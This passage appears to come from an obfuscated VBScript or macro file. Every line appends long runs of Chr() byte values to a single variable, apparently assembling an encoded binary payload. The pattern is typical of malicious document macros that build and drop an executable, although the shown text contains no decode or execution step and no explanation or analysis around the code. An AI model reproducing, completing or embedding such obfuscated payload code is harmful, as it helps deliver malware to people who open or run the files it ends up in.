r(130)&Chr(243)&Chr(46)&Chr(241)&Chr(31)&Chr(166)&Chr(227)&Chr(79)&Chr(218)&Chr(155)&Chr(23)&Chr(216)&Chr(77)&Chr(13)&Chr(29)&Chr(233)&Chr(245)&Chr(118)&Chr(75)&Chr(17)&Chr(93)&Chr(97)&Chr(210)&Chr(181)&Chr(130)&Chr(180)&Chr(249)&Chr(123)&Chr(71)&Chr(184)&Chr(118)&Chr(249)&Chr(201)&Chr(231)&Chr(125)&Chr(151)&Chr(72)&Chr(157)&Chr(75)&Chr(41)&Chr(139)&Chr(112)&Chr(44)&Chr(181)&Chr(145)&Chr(197)&Chr(211)&Chr(247)&Chr(1)&Chr(34)&Chr(209)&Chr(67)&Chr(164)&Chr(233)&Chr(33)&Chr(82)&Chr(224)&Chr(101)&Chr(59)&Chr(177)&Chr(181)&Chr(208)&Chr(202)&Chr(205)&Chr(66)\nwvWPLP=wvWPLP&Chr(50)&Chr(53)&Chr(181)&Chr(169)&Chr(48)&Chr(229)&Chr(163)&Chr(77)&Chr(164)&Chr(123)&Chr(164)&Chr(64)&Chr(219)&Chr(111)&Chr(224)&Chr(32)&Chr(191)&Chr(171)&Chr(58)&Chr(166)&Chr(181)&Chr(240)&Chr(62)&Chr(98)&Chr(207)&Chr(160)&Chr(94)&Chr
(255)&Chr(211)&Chr(200)&Chr(147)&Chr(102)&Chr(104)&Chr(92)&Chr(178)&Chr(210)&Chr(138)&Chr(51)&Chr(3)&Chr(27)&Chr(244)&Chr(110)&Chr(214)&Chr(166)&Chr(52)&Chr(175)&Chr(168)&Chr(115)&Chr(191)&Chr(80)&Chr(54)&Chr(30)&Chr(166)&Chr(127)&Chr(37)&Chr(209)&Chr(112)&Chr(103)&Chr(141)&Chr(204)&Chr(82)&Chr(0)&Chr(255)&Chr(79)&Chr(9)&Chr(26)&Chr(0)&Chr(82)&Chr(121)&Chr(55)&Chr(50)&Chr(25)&Chr(248)&Chr(220)&Chr(8)&Chr(22)&Chr(129)&Chr(147)&Chr(93)&Chr(71)&Chr(146)&Chr(142)&Chr(170)&Chr(107)&Chr(223)&Chr(110)&Chr(86)&Chr(181)&Chr(178)&Chr(48)&Chr(125)&Chr(179)&Chr(63)&Chr(216)&Chr(201)&Chr(72)&Chr(21)&Chr(26)&Chr(172)&Chr(248)\nwvWPLP=wvWPLP&Chr(222)&Chr(164)&Chr(1)&Chr(147)&Chr(215)&Chr(120)&Chr(59)&Chr(103)&Chr(95)&Chr(232)&Chr(56)&Chr(138)&Chr(17)&Chr(194)&Chr(223)&Chr(51)&Chr(210)&Chr(21)&Chr(7)&Chr(208)&Chr(167)&Chr(1)&Chr(57)&Chr(43)&Chr(242)&Chr(79)&Chr(15)&Chr(147)&Chr(234)&Chr(19)&Chr(204)&Chr(218)&Chr(162)&Chr(124)&Chr(63)&Chr(69)&Chr(75)&Chr(117)&Chr(183)&Chr(72)&Chr(223)&Chr(103)&Chr(23)&Chr(214)&Chr(162)&Chr(225)&Chr(103)&Chr(115)&Chr(88)&Chr(113)&Chr(17)&Chr(11)&Chr(50)&Chr(234)&Chr(70)&Chr(67)&Chr(50)&Chr(232)&Chr(62)&Chr(18)&Chr(152)&Chr(142)&Chr(197)&Chr(106)&Chr(93)&Chr(50)&Chr(8)&Chr(198)&Chr(225)&Chr(13)&Chr(109)&Chr(252)&Chr(73)&Chr(151)&Chr(153)&Chr(127)&Chr(127)&Chr(69)&Chr(186)&Chr(8)&Chr(232)&Chr(98)&Chr(79)&Chr(63)&Chr(153)&Chr(156)&Chr(143)&Chr(225)&Chr(170)&Chr(254)&Chr(254)&Chr(162)&Chr(235)&Chr(221)&Chr(217)&Chr(142)&Chr(129)&Chr(74)&Chr(46)&Chr(112)\nwvWPLP=wvWPLP&Chr(161)&Chr(110)&Chr(25)&Chr(81)&Chr(253)&Chr(154)&Chr(98)&Chr(175)&Chr(106)&Chr(6)&Chr(122)&Chr(40)&Chr(89)&Chr(165)&Chr(26)&Chr(152)&Chr(120)&Chr(243)&Chr(105)&Chr(249)&Chr(170)&Chr(215)&Chr(116)&Chr(161)&Chr(118)&Chr(117)&Chr(6)&Chr(40)&Chr(246)&Chr(190)&Chr(242)&Chr(157)&Chr(39)&Chr(121)&Chr(253)&Chr(100)&Chr(44)&Chr(179)&Chr(60)&Chr(95)&Chr(90)&Chr(248)&Chr(181)&Chr(238)&Chr(24)&Chr(40)&Chr(247)&Chr(134)&Chr(234)&Chr(88)&Chr(195)&Chr(234)&Chr(121)&Chr(31)&Chr(176)&Chr(11)&Chr(68)&Chr(
142)&Chr(149)&Chr(93)&Chr(252)&Chr(212)&Chr(86)&Chr(73)&Chr(77)&Chr(38)&Chr(81)&Chr(24)&Chr(68)&Chr(160)&Chr(226)&Chr(19)&Chr(100)&Chr(99)&Chr(10)&Chr(205)&Chr(76)&Chr(86)&Chr(76)&Chr(126)&Chr(228)&Chr(246)&Chr(175)&Chr(107)&Chr(39)&Chr(137)&Chr(254)&Chr(140)&Chr(60)&Chr(29)&Chr(112)&Chr(111)&Chr(118)&Chr(42)&Chr(193)&Chr(68)&Chr(252)&Chr(57)&Chr(191)&Chr(136)\nwvWPLP=wvWPLP&Chr(152)&Chr(180)&Chr(239)&Chr(142)&Chr(103)&Chr(225)&Chr(33)&Chr(1)&Chr(25)&Chr(38)&Chr(181)&Chr(87)&Chr(205)&Chr(123)&Chr(154)&Chr(144)&Chr(129)&Chr(14)&Chr(17)&Chr(96)&Chr(7)&Chr(144)&Chr(16)&Chr(226)&Chr(176)&Chr(66)&Chr(242)&Chr(93)&Chr(177)&Chr(220)&Chr(112)&Chr(41)&Chr(24)&Chr(180)&Chr(206)&Chr(91)&Chr(246)&Chr(14)&Chr(217)&Chr(194)&Chr(29)&Chr(151)&Chr(136)&Chr(26)&Chr(169)&Chr(145)&Chr(50)&Chr(224)&Chr(65)&Chr(180)&Chr(73)&Chr(204)&Chr(214)&Chr(230)&Chr(209)&Chr(251)&Chr(96)&Chr(178)&Chr(53)&Chr(232)&Chr(47)&Chr(183)&Chr(179)&Chr(125)&Chr(197)&Chr(58)&Chr(95)&Chr(248)&Chr(85)&Chr(176)&Chr(80)&Chr(113)&Chr(47)&Chr(244)&Chr(10)&Chr(6)&Chr(67)&Chr(191)&Chr(107)&Chr(191)&Chr(234)&Chr(34)&Chr(2)&Chr(12)&Chr(160)&Chr(199)&Chr(50)&Chr(54)&Chr(82)&Chr(54)&Chr(42)&Chr(221)&Chr(38)&Chr(115)&Chr(149)&Chr(5)&Chr(112)&Chr(166)&Chr(233)&Chr(3)\nwvWPLP=wvWPLP&Chr(41)&Chr(9)&Chr(252)&Chr(185)&Chr(54)&Chr(244)&Chr(186)&Chr(241)&Chr(126)&Chr(46)&Chr(80)&Chr(4)&Chr(3)&Chr(152)&Chr(49)&Chr(179)&Chr(200)&Chr(104)&Chr(56)&Chr(149)&Chr(125)&Chr(103)&Chr(148)&Chr(9)&Chr(102)&Chr(147)&Chr(227)&Chr(255)&Chr(85)&Chr(57)&Chr(190)&Chr(161)&Chr(99)&Chr(133)&Chr(46)&Chr(208)&Chr(93)&Chr(115)&Chr(78)&Chr(87)&Chr(225)&Chr(132)&Chr(173)&Chr(198)&Chr(89)&Chr(133)&Chr(194)&Chr(113)&Chr(88)&Chr(88)&Chr(228)&Chr(134)&Chr(80)&Chr(176)&Chr(94)&Chr(42)&Chr(142)&Chr(19)&Chr(233)&Chr(98)&Chr(234)&Chr(202)&Chr(56)&Chr(228)&Chr(127)&Chr(5)&Chr(51)&Chr(54)&Chr(72)&Chr(86)&Chr(174)&Chr(61)&Chr(167)&Chr(124)&Chr(66)&Chr(169)&Chr(159)&Chr(195)&Chr(86)&Chr(170)&Chr(227)&Chr(89)&Chr(48)&Chr(20)&Chr(249)&Chr(158)&Chr(20)&Chr(42)&Chr(130)
&Chr(159)&Chr(115)&Chr(185)&Chr(223)&Chr(69)&Chr(53)&Chr(252)&Chr(51)&Chr(20)&Chr(47)&Chr(177)\nwvWPLP=wvWPLP&Chr(23)&Chr(130)&Chr(38)&Chr(166)&Chr(90)&Chr(126)&Chr(243)&Chr(202)&Chr(243)&Chr(254)&Chr(252)&Chr(195)&Chr(174)&Chr(62)&Chr(109)&Chr(186)&Chr(231)&Chr(115)&Chr(77)&Chr(26)&Chr(253)&Chr(179)&Chr(195)&Chr(54)&Chr(34)&Chr(69)&Chr(40)&Chr(139)&Chr(92)&Chr(68)&Chr(187)&Chr(17)&Chr(121)&Chr(69)&Chr(118)&Chr(194)&Chr(119)&Chr(191)&Chr(97)&Chr(108)&Chr(55)&Chr(30)&Chr(226)&Chr(100)&Chr(52)&Chr(195)&Chr(238)&Chr(55)&Chr(144)&Chr(177)&Chr(222)&Chr(61)&Chr(1)&Chr(209)&Chr(83)&Chr(41)&Chr(93)&Chr(22)&Chr(55)&Chr(24)&Chr(81)&Chr(75)&Chr(127)&Chr(198)&Chr(161)&Chr(15)&Chr(34)&Chr(232)&Chr(188)&Chr(202)&Chr(10)&Chr(194)&Chr(163)&Chr(219)&Chr(51)&Chr(116)&Chr(139)&Chr(228)&Chr(75)&Chr(120)&Chr(99)&Chr(81)&Chr(72)&Chr(177)&Chr(229)&Chr(197)&Chr(79)&Chr(171)&Chr(225)&Chr(253)&Chr(132)&Chr(41)&Chr(235)&Chr(75)&Chr(142)&Chr(80)&Chr(131)&Chr(116)&Chr(244)&Chr(109)\nwvWPLP=wvWPLP&Chr(181)&Chr(113)&Chr(230)&Chr(145)&Chr(64)&Chr(197)&Chr(117)&Chr(181)&Chr(84)&Chr(209)&Chr(226)&Chr(22)&Chr(146)&Chr(89)&Chr(182)&Chr(6)&Chr(159)&Chr(250)&Chr(138)&Chr(80)&Chr(88)&Chr(231)&Chr(63)&Chr(80)&Chr(19)&Chr(249)&Chr(241)&Chr(180)&Chr(163)&Chr(87)&Chr(160)&Chr(206)&Chr(88)&Chr(118)&Chr(15)&Chr(196)&Chr(168)&Chr(193)&Chr(92)&Chr(182)&Chr(156)&Chr(79)&Chr(137)&Chr(155)&Chr(162)&Chr(112)&Chr(132)&Chr(228)&Chr(93)&Chr(57)&Chr(205)&Chr(40)&Chr(83)&Chr(234)&Chr(153)&Chr(214)&Chr(185)&Chr(255)&Chr(40)&Chr(170)&Chr(102)&Chr(49)&Chr(253)&Chr(129)&Chr(54)&Chr(195)&Chr(192)&Chr(123)&Chr(196)&Chr(121)&Chr(5)&Chr(91)&Chr(154)&Chr(73)&Chr(79)&Chr(37)&Chr(106)&Chr(11)&Chr(60)&Chr(72)&Chr(251)&Chr(100)&Chr(98)&Chr(3)&Chr(56)&Chr(251)&Chr(4)&Chr(37)&Chr(160)&Chr(40)&Chr(111)&Chr(81)&Chr(137)&Chr(79)&Chr(81)&Chr(6)&Chr(104)&Chr(204)&Chr(47)&Chr(19)\nwvWPLP=wvWPLP&Chr(119)&Chr(185)&Chr(209)&Chr(225)&Chr(5)&Chr(207)&Chr(38)&Chr(120)&Chr(90)&Chr(243)&Chr(192)&Chr(188)&Chr(184)&Chr(12)&Chr(211)&Chr(233)&Chr(138)&C
hr(157)&Chr(7)&Chr(7)&Chr(247)&Chr(71)&Chr(242)&Chr(253)&Chr(193)&Chr(236)&Chr(83)&Chr(169)&Chr(8)&Chr(31)&Chr(19)&Chr(85)&Chr(249)&Chr(32)&Chr(221)&Chr(134)&Chr(88)&Chr(76)&Chr(185)&Chr(82)&Chr(126)&Chr(166)&Chr(49)&Chr(125)&Chr(50)&Chr(164)&Chr(97)&Chr(141)&Chr(82)&Chr(179)&Chr(79)&Chr(254)&Chr(133)&Chr(105)&Chr(99)&Chr(238)&Chr(47)&Chr(150)&Chr(84)&Chr(114)&Chr(179)&Chr(144)&Chr(42)&Chr(78)&Chr(125)&Chr(145)&Chr(157)&Chr(43)&Chr(86)&Chr(225)&Chr(19)&Chr(82)&Chr(186)&Chr(176)&Chr(116)&Chr(56)&Chr(163)&Chr(216)&Chr(119)&Chr(196)&Chr(186)&Chr(220)&Chr(25)&Chr(75)&Chr(58)&Chr(9)&Chr(185)&Chr(14)&Chr(121)&Chr(108)&Chr(135)&Chr(225)&Chr(20)&Chr(200)&Chr(56)&Chr(35)&Chr(148)&Chr(98)&Chr(185)&Chr(127)\nwvWPLP=wvWPLP&Chr(128)&Chr(248)&Chr(252)&Chr(151)&Chr(64)&Chr(193)&Chr(62)&Chr(250)&Chr(184)&Chr(148)&Chr(155)&Chr(168)&Chr(67)&Chr(245)&Chr(156)&Chr(43)&Chr(36)&Chr(152)&Chr(38)&Chr(53)&Chr(167)&Chr(31)&Chr(79)&Chr(254)&Chr(229)&Chr(134)&Chr(175)&Chr(48)&Chr(196)&Chr(3)&Chr(225)&Chr(33)&Chr(90)&Chr(168)&Chr(73)&Chr(52)&Chr(128)&Chr(184)&Chr(120)&Chr(191)&Chr(238)&Chr(234)&Chr(53)&Chr(14)&Chr(107)&Chr(171)&Chr(231)&Chr(3)&Chr(152)&Chr(251)&Chr(113)&Chr(21)&Chr(39)&Chr(88)&Chr(32)&Chr(44)&Chr(81)&Chr(205)&Chr(126)&Chr(187)&Chr(180)&Chr(179)&Chr(135)&Chr(87)&Chr(56)&Chr(182)&Chr(235)&Chr(128)&Chr(51)&Chr(84)&Chr(231)&Chr(190)&Chr(55)&Chr(131)&Chr(254)&Chr(4)&Chr(243)&Chr(220)&Chr(173)&Chr(254)&Chr(251)&Chr(40)&Chr(129)&Chr(31)&Chr(249)&Chr(49)&Chr(87)&Chr(186)&Chr(161)&Chr(24)&Chr(92)&Chr(3)&Chr(35)&Chr(52)&Chr(92)&Chr(40)&Chr(20)&Chr(159)&Chr(73)&Chr(41)\nwvWPLP=wvWPLP&Chr(6)&Chr(60)&Chr(9)&Chr(199)&Chr(142)&Chr(103)&Chr(36)&Chr(25)&Chr(138)&Chr(66)&Chr(169)&Chr(52)&Chr(86)&Chr(99)&Chr(192)&Chr(51)&Chr(89)&Chr(32)&Chr(192)&Chr(228)&Chr(149)&Chr(3)&Chr(13)&Chr(29)&Chr(54)&Chr(213)&Chr(197)&Chr(83)&Chr(61)&Chr(147)&Chr(187)&Chr(196)&Chr(6)&Chr(201)&Chr(16)&Chr(103)&Chr(62)&Chr(147)&Chr(48)&Chr(189)&Chr(222)&Chr(63)&Chr(28)&Chr(18)&Chr(25)&Chr(86)&Chr(160)&Chr(151)&Chr(160)&Ch
r(212)&Chr(18)&Chr(37)&Chr(161)&Chr(231)&Chr(159)&Chr(39)&Chr(134)&Chr(206)&Chr(84)&Chr(36)&Chr(206)&Chr(135)&Chr(166)&Chr(192)&Chr(1)&Chr(78)&Chr(26)&Chr(101)&Chr(254)&Chr(49)&Chr(53)&Chr(34)&Chr(73)&Chr(211)&Chr(150)&Chr(22)&Chr(116)&Chr(97)&Chr(80)&Chr(205)&Chr(168)&Chr(44)&Chr(99)&Chr(185)&Chr(206)&Chr(44)&Chr(7)&Chr(50)&Chr(105)&Chr(234)&Chr(9)&Chr(6)&Chr(13)&Chr(107)&Chr(123)&Chr(216)&Chr(183)&Chr(39)&Chr(159)&Chr(253)\nwvWPLP=wvWPLP&Chr(107)&Chr(117)&Chr(167)&Chr(122)&Chr(25)&Chr(197)&Chr(171)&Chr(250)&Chr(180)&Chr(18)&Chr(16)&Chr(117)&Chr(252)&Chr(76)&Chr(17)&Chr(70)&Chr(42)&Chr(112)&Chr(19)&Chr(131)&Chr(252)&Chr(38)&Chr(79)&Chr(0)&Chr(193)&Chr(56)&Chr(101)&Chr(50)&Chr(240)&Chr(107)&Chr(146)&Chr(129)&Chr(164)&Chr(131)&Chr(39)&Chr(117)&Chr(231)&Chr(7)&Chr(208)&Chr(241)&Chr(90)&Chr(211)&Chr(34)&Chr(106)&Chr(39)&Chr(72)&Chr(92)&Chr(28)&Chr(227)&Chr(169)&Chr(229)&Chr(235)&Chr(183)&Chr(241)&Chr(228)&Chr(186)&Chr(191)&Chr(12)&Chr(151)&Chr(52)&Chr(104)&Chr(161)&Chr(84)&Chr(47)&Chr(169)&Chr(236)&Chr(7)&Chr(90)&Chr(193)&Chr(65)&Chr(191)&Chr(87)&Chr(206)&Chr(214)&Chr(57)&Chr(159)&Chr(72)&Chr(48)&Chr(185)&Chr(149)&Chr(4)&Chr(107)&Chr(46)&Chr(228)&Chr(81)&Chr(110)&Chr(57)&Chr(2)&Chr(232)&Chr(164)&Chr(133)&Chr(117)&Chr(61)&Chr(232)&Chr(11)&Chr(39)&Chr(77)&Chr(198)&Chr(86)&Chr(155)\nwvWPLP=wvWPLP&Chr(248)&Chr(225)&Chr(226)&Chr(157)&Chr(141)&Chr(189)&Chr(100)&Chr(198)&Chr(133)&Chr(227)&Chr(84)&Chr(157)&Chr(36)&Chr(7)&Chr(127)&Chr(245)&Chr(187)&Chr(173)&Chr(4)&Chr(96)&Chr(115)&Chr(91)&Chr(214)&Chr(203)&Chr(173)&Chr(147)&Chr(96)&Chr(25)&Chr(22)&Chr(241)&Chr(41)&Chr(134)&Chr(159)&Chr(250)&Chr(226)&Chr(218)&Chr(196)&Chr(87)&Chr(127)&Chr(98)&Chr(29)&Chr(19)&Chr(126)&Chr(15)&Chr(119)&Chr(223)&Chr(233)&Chr(64)&Chr(56)&Chr(21)&Chr(70)&Chr(198)&Chr(226)&Chr(24)&Chr(178)&Chr(137)&Chr(196)&Chr(8)&Chr(94)&Chr(26)&Chr(157)&Chr(163)&Chr(81)&Chr(187)&Chr(199)&Chr(144)&Chr(249)&Chr(4)&Chr(247)&Chr(115)&Chr(137)&Chr(57)&Chr(147)&Chr(8)&Chr(45)&Chr(223)&Chr(39)&Chr(221)&Chr(59)&Chr(57)&Chr(
238)&Chr(181)&Chr(145)&Chr(170)&Chr(190)&Chr(173)&Chr(228)&Chr(65)&Chr(204)&Chr(60)&Chr(149)&Chr(29)&Chr(249)&Chr(51)&Chr(14)&Chr(74)&Chr(234)&Chr(91)&Chr(23)&Chr(78)\nwvWPLP=wvWPLP&Chr(18)&Chr(239)&Chr(113)&Chr(143)&Chr(166)&Chr(5)&Chr(53)&Chr(20)&Chr(94)&Chr(109)&Chr(198)&Chr(249)&Chr(82)&Chr(110)&Chr(250)&Chr(44)&Chr(26)&Chr(19)&Chr(152)&Chr(6)&Chr(35)&Chr(255)&Chr(212)&Chr(24)&Chr(110)&Chr(151)&Chr(61)&Chr(88)&Chr(80)&Chr(204)&Chr(142)&Chr(27)&Chr(51)&Chr(101)&Chr(1)&Chr(239)&Chr(29)&Chr(83)&Chr(52)&Chr(39)&Chr(68)&Chr(164)&Chr(222)&Chr(69)&Chr(22)&Chr(25)&Chr(244)&Chr(75)&Chr(201)&Chr(239)&Chr(45)&Chr(168)&Chr(145)&Chr(112)&Chr(31)&Chr(191)&Chr(227)&Chr(11)&Chr(59)&Chr(190)&Chr(231)&Chr(87)&Chr(128)&Chr(87)&Chr(26)&Chr(109)&Chr(67)&Chr(60)&Chr(192)&Chr(184)&Chr(89)&Chr(77)&Chr(236)&Chr(188)&Chr(193)&Chr(15)&Chr(14)&Chr(233)&Chr(72)&Chr(74)&Chr(34)&Chr(249)&Chr(7)&Chr(12)&Chr(245)&Chr(12)&Chr(83)&Chr(138)&Chr(90)&Chr(120)&Chr(95)&Chr(132)&Chr(139)&Chr(149)&Chr(241)&Chr(122)&Chr(72)&Chr(195)&Chr(231)&Chr(214)\nwvWPLP=wvWPLP&Chr(23)&Chr(53)&Chr(104)&Chr(181)&Chr(203)&Chr(43)&Chr(45)&Chr(234)&Chr(211)&Chr(94)&Chr(103)&Chr(155)&Chr(117)&Chr(25)&Chr(104)&Chr(129)&Chr(140)&Chr(132)&Chr(249)&Chr(15)&Chr(35)&Chr(98)&Chr(151)&Chr(135)&Chr(164)&Chr(88)&Chr(15)&Chr(68)&Chr(21)&Chr(2)&Chr(95)&Chr(113)&Chr(82)&Chr(229)&Chr(135)&Chr(82)&Chr(173)&Chr(58)&Chr(247)&Chr(233)&Chr(185)&Chr(137)&Chr(98)&Chr(128)&Chr(162)&Chr(240)&Chr(161)&Chr(118)&Chr(121)&Chr(198)&Chr(11)&Chr(167)&Chr(236)&Chr(64)&Chr(0)&Chr(182)&Chr(118)&Chr(206)&Chr(195)&Chr(85)&Chr(93)&Chr(165)&Chr(210)&Chr(250)&Chr(232)&Chr(43)&Chr(99)&Chr(120)&Chr(64)&Chr(34)&Chr(131)&Chr(133)&Chr(179)&Chr(149)&Chr(202)&Chr(143)&Chr(96)&Chr(254)&Chr(217)&Chr(238)&Chr(173)&Chr(118)&Chr(246)&Chr(87)&Chr(65)&Chr(44)&Chr(80)&Chr(250)&Chr(235)&Chr(45)&Chr(207)&Chr(86)&Chr(216)&Chr(11)&Chr(16)&Chr(125)&Chr(155)&Chr(209)&Chr(11)&Chr(99)\nwvWPLP=wvWPLP&Chr(6)&Chr(232)&Chr(31)&Chr(239)&Chr(232)&Chr(15)&Chr(64)&Chr(12)&Chr(219)&Chr(167)
&Chr(185)&Chr(172)&Chr(162)&Chr(86)&Chr(28)&Chr(98)&Chr(4)&Chr(245)&Chr(20)&Chr(152)&Chr(31)&Chr(126)&Chr(204)&Chr(227)&Chr(205)&Chr(154)&Chr(245)&Chr(240)&Chr(224)&Chr(161)&Chr(237)&Chr(131)&Chr(51)&Chr(180)&Chr(125)&Chr(60)&Chr(107)&Chr(70)&Chr(125)&Chr(49)&Chr(233)&Chr(156)&Chr(81)&Chr(8)&Chr(168)&Chr(175)&Chr(181)&Chr(73)&Chr(43)&Chr(81)&Chr(238)&Chr(17)&Chr(235)&Chr(49)&Chr(85)&Chr(144)&Chr(40)&Chr(228)&Chr(191)&Chr(76)&Chr(247)&Chr(226)&Chr(43)&Chr(197)&Chr(255)&Chr(239)&Chr(197)&Chr(74)&Chr(73)&Chr(185)&Chr(103)&Chr(46)&Chr(6)&Chr(208)&Chr(249)&Chr(101)&Chr(57)&Chr(179)&Chr(95)&Chr(80)&Chr(64)&Chr(106)&Chr(58)&Chr(103)&Chr(166)&Chr(76)&Chr(151)&Chr(64)&Chr(138)&Chr(186)&Chr(165)&Chr(207)&Chr(116)&Chr(223)&Chr(148)&Chr(112)&Chr(75)&Chr(9)&Chr(53)&Chr(216)\nwvWPLP=wvWPLP&Chr(164)&Chr(146)&Chr(37)&Chr(178)&Chr(157)&Chr(197)&Chr(99)&Chr(142)&Chr(129)&Chr(132)&Chr(76)&Chr(142)&Chr(53)&Chr(49)&Chr(218)&Chr(62)&Chr(248)&Chr(102)&Chr(117)&Chr(91)&Chr(17)&Chr(110)&Chr(172)&Chr(238)&Chr(48)&Chr(214)&Chr(233)&Chr(200)&Chr(84)&Chr(190)&Chr(225)&Chr(179)&Chr(125)&Chr(142)&Chr(113)&Chr(250)&Chr(109)&Chr(253)&Chr(90)&Chr(145)&Chr(29)&Chr(42)&Chr(52)&Chr(64)&Chr(26)&Chr(8)&Chr(91)&Chr(149)&Chr(112)&Chr(218)&Chr(137)&Chr(2)&Chr(30)&Chr(159)&Chr(65)&Chr(190)&Chr(24)&Chr(106)&Chr(208)&Chr(211)&Chr(139)&Chr(97)&Chr(145)&Chr(173)&Chr(174)&Chr(229)&Chr(140)&Chr(140)&Chr(118)&Chr(44)&Chr(64)&Chr(17)&Chr(176)&Chr(128)&Chr(54)&Chr(112)&Chr(253)&Chr(120)&Chr(49)&Chr(80)&Chr(135)&Chr(23)&Chr(67)&Chr(212)&Chr(3)&Chr(253)&Chr(108)&Chr(200)&Chr(147)&Chr(132)&Chr(50)&Chr(147)&Chr(22)&Chr(111)&Chr(192)&Chr(42)&Chr(149)&Chr(198)&Chr(161)&Chr(21)\nwvWPLP=wvWPLP&Chr(112)&Chr(92)&Chr(121)&Chr(102)&Chr(22)&Chr(122)&Chr(244)&Chr(161)&Chr(193)&Chr(245)&Chr(31)&Chr(229)&Chr(206)&Chr(45)&Chr(47)&Chr(128)&Chr(147)&Chr(197)&Chr(186)&Chr(127)&Chr(197)&Chr(183)&Chr(251)&Chr(218)&Chr(2)&Chr(138)&Chr(144)&Chr(85)&Chr(154)&Chr(13)&Chr(60)&Chr(120)&Chr(158)&Chr(224)&Chr(113)&Chr(175)&Chr(113)&Chr(143)&Chr(1
53)&Chr(27)&Chr(233)&Chr(85)&Chr(140)&Chr(202)&Chr(3)&Chr(237)&Chr(54)&Chr(241)&Chr(224)&Chr(140)&Chr(158)&Chr(80)&Chr(221)&Chr(105)&Chr(50)&Chr(171)&Chr(179)&Chr(93)&Chr(108)&Chr(134)&Chr(110)&Chr(185)&Chr(242)&Chr(102)&Chr(27)&Chr(16)&Chr(113)&Chr(182)&Chr(192)&Chr(220)&Chr(155)&Chr(77)&Chr(118)&Chr(44)&Chr(100)&Chr(82)&Chr(44)&Chr(128)&Chr(78)&Chr(53)&Chr(24)&Chr(216)&Chr(176)&Chr(136)&Chr(45)&Chr(19)&Chr(72)&Chr(127)&Chr(7)&Chr(55)&Chr(236)&Chr(113)&Chr(111)&Chr(63)&Chr(255)&Chr(142)&Chr(250)&Chr(172)&Chr(137)&Chr(14)\nwvWPLP=wvWPLP&Chr(71)&Chr(157)&Chr(93)&Chr(205)&Chr(73)&Chr(131)&Chr(24)&Chr(15)&Chr(184)&Chr(121)&Chr(1)&Chr(140)&Chr(128)&Chr(130)&Chr(209)&Chr(37)&Chr(193)&Chr(109)&Chr(5)&Chr(141)&Chr(41)&Chr(234)&Chr(3)&Chr(146)&Chr(204)&Chr(61)&Chr(0)&Chr(105)&Chr(214)&Chr(34)&Chr(96)&Chr(204)&Chr(175)&Chr(24)&Chr(228)&Chr(150)&Chr(159)&Chr(106)&Chr(133)&Chr(149)&Chr(30)&Chr(253)&Chr(229)&Chr(189)&Chr(217)&Chr(176)&Chr(121)&Chr(77)&Chr(19)&Chr(195)&Chr(138)&Chr(155)&Chr(36)&Chr(4)&Chr(20)&Chr(81)&Chr(152)&Chr(168)&Chr(17)&Chr(120)&Chr(237)&Chr(68)&Chr(109)&Chr(174)&Chr(252)&Chr(244)&Chr(105)&Chr(221)&Chr(214)&Chr(55)&Chr(124)&Chr(236)&Chr(225)&Chr(76)&Chr(33)&Chr(116)&Chr(247)&Chr(42)&Chr(81)&Chr(61)&Chr(250)&Chr(199)&Chr(24)&Chr(170)&Chr(72)&Chr(191)&Chr(241)&Chr(7)&Chr(195)&Chr(246)&Chr(77)&Chr(234)&Chr(137)&Chr(94)&Chr(114)&Chr(189)&Chr(31)&Chr(226)&Chr(27)&Chr(191)\nwvWPLP=wvWPLP&Chr(42)&Chr(245)&Chr(129)&Chr(134)&Chr(220)&Chr(21)&Chr(123)&Chr(182)&Chr(127)&Chr(219)&Chr(228)&Chr(119)&Chr(255)&Chr(117)&Chr(129)&Chr(239)&Chr(166)&Chr(134)&Chr(217)&Chr(209)&Chr(152)&Chr(76)&Chr(141)&Chr(215)&Chr(91)&Chr(19)&Chr(168)&Chr(26)&Chr(18)&Chr(232)&Chr(214)&Chr(33)&Chr(38)&Chr(125)&Chr(42)&Chr(212)&Chr(122)&Chr(73)&Chr(63)&Chr(114)&Chr(57)&Chr(78)&Chr(28)&Chr(109)&Chr(99)&Chr(225)&Chr(64)&Chr(76)&Chr(182)&Chr(124)&Chr(193)&Chr(63)&Chr(235)&Chr(58)&Chr(174)&Chr(249)&Chr(71)&Chr(63)&Chr(248)&Chr(27)&Chr(130)&Chr(208)&Chr(192)&Chr(34)&Chr(151)&Chr(175)&Chr(199)&Chr(18
8)&Chr(109)&Chr(182)&Chr(128)&Chr(243)&Chr(33)&Chr(227)&Chr(207)&Chr(2)&Chr(71)&Chr(121)&Chr(185)&Chr(156)&Chr(227)&Chr(230)&Chr(70)&Chr(61)&Chr(75)&Chr(78)&Chr(101)&Chr(225)&Chr(189)&Chr(92)&Chr(170)&Chr(39)&Chr(86)&Chr(205)&Chr(221)&Chr(112)&Chr(48)&Chr(160)&Chr(14)&Chr(246)\nwvWPLP=wvWPLP&Chr(164)&Chr(137)&Chr(252)&Chr(103)&Chr(127)&Chr(18)&Chr(224)&Chr(86)&Chr(19)&Chr(251)&Chr(60)&Chr(165)&Chr(38)&Chr(148)&Chr(60)&Chr(116)&Chr(145)&Chr(133)&Chr(66)&Chr(179)&Chr(198)&Chr(204)&Chr(83)&Chr(235)&Chr(129)&Chr(188)&Chr(8)&Chr(235)&Chr(121)&Chr(254)&Chr(109)&Chr(210)&Chr(12)&Chr(29)&Chr(83)&Chr(0)&Chr(110)&Chr(240)&Chr(248)&Chr(35)&Chr(171)&Chr(253)&Chr(136)&Chr(35)&Chr(30)&Chr(117)&Chr(2)&Chr(197)&Chr(90)&Chr(44)&Chr(6)&Chr(159)&Chr(55)&Chr(38)&Chr(84)&Chr(152)&Chr(180)&Chr(231)&Chr(212)&Chr(174)&Chr(237)&Chr(141)&Chr(205)&Chr(34)&Chr(48)&Chr(129)&Chr(142)&Chr(78)&Chr(141)&Chr(238)&Chr(228)&Chr(174)&Chr(236)&Chr(152)&Chr(149)&Chr(157)&Chr(232)&Chr(192)&Chr(5)&Chr(66)&Chr(219)&Chr(50)&Chr(127)&Chr(34)&Chr(129)&Chr(159)&Chr(240)&Chr(224)&Chr(73)&Chr(232)&Chr(93)&Chr(184)&Chr(126)&Chr(142)&Chr(32)&Chr(72)&Chr(232)&Chr(145)&Chr(30)&Chr(168)\nwvWPLP=wvWPLP&Chr(190)&Chr(97)&Chr(246)&Chr(225)&Chr(190)&Chr(213)&Chr(196)&Chr(255)&Chr(19)&Chr(111)&Chr(174)&Chr(76)&Chr(239)&Chr(119)&Chr(60)&Chr(16)&Chr(153)&Chr(247)&Chr(46)&Chr(239)&Chr(107)&Chr(95)&Chr(98)&Chr(157)&Chr(27)&Chr(45)&Chr(44)&Chr(63)&Chr(121)&Chr(138)&Chr(166)&Ch